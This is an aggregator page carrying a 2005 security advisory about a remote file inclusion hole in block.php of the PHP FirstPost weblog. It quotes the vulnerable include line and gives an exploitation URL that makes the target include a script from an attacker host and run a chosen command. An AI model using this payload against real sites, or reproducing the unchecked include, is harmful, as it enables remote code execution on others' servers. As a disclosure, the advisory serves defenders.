Lucene search

K

phpFirstPost.txt

🗓️ 28 Jul 2005 00:00:00Reported by GBType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

High risk in PHP FirstPost allows remote users to execute arbitrary commands via block.php inclusion.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Language: PHP  
Project name: PHP FirstPost  
Risk:High  
Home page: http://phpfirstpost.sourceforge.net  
Discovered by: ][GB][  
  
[Description]:  
  
PHP FirstPost is yet another PHP weblog. This one, however, is based  
on Scoop, and has the open submission queue and comment rating system.  
  
A vulnerability exists in PHP FirstPost, which could allow any remote  
user to include a php script for execute arbitrary commands on the  
target system.  
  
[Details]:  
  
The problem exists is in the file "block.php" when includes the  
variable $Include  
  
<?php if($Include) { include($Include); }; ?>  
  
[Exploitation example]:  
  
http://[target]/path_to_script/block.php?Include=http://[attacker]/cmd.gif?&cmd=|command|  
  
[Credits]:  
thanks to Zetha  
  
also greetz to:  
uyx  
r3v3ng4ns  
b-04  
LINUX  
HaCkZaTaN  
beford  
Mafia_boy  
lithyum  
darksteel  
caffa  
nologro  
unicked  
  
... and all the ppl of irc.gigachat.net #Uruguay, #ASC & #SWC  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Jul 2005 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report